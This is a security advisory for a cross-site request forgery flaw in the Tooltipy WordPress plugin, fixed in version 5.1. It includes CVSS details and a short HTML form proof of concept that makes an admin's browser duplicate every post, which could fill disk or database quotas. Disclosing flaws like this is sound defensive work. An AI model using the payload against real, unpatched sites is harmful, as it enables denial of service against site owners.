CVSS Summary
| Score | 4.3 Medium | 
|---|---|
| Vector | Network | 
| Complexity | Medium | 
| Authentication | None | 
| Confidentiality | None | 
| Integrity | Partial | 
| Availability | None | 
Last revised:
There is a CSRF vulnerability in Tooltipy’s “KTTG Converter” feature which allows anybody able to convince an admin to follow a link to duplicate posts. The PoC provided below allows duplicating every post with post_type post. The most obvious malicious use of this vulnerability would be to fill up a disk or database quota which might lead to denial of service or other issues.
Current state: Fixed
| Score | 4.3 Medium | 
|---|---|
| Vector | Network | 
| Complexity | Medium | 
| Authentication | None | 
| Confidentiality | None | 
| Integrity | Partial | 
| Availability | None | 
Open a page containing the following HTML, and click submit:
<form method="POST" action="http://localhost/wp-admin/tools.php?page=my_keywords_settings_importer"> <input type="text" name="go" value="true"> <input type="text" name="bluet_posttypes_list" value="post"> <input type="submit"> </form>
Every post with post_type post will have been duplicated.
In a real attack, the form can be made to autosubmit.
Upgrade to version 5.1 or later.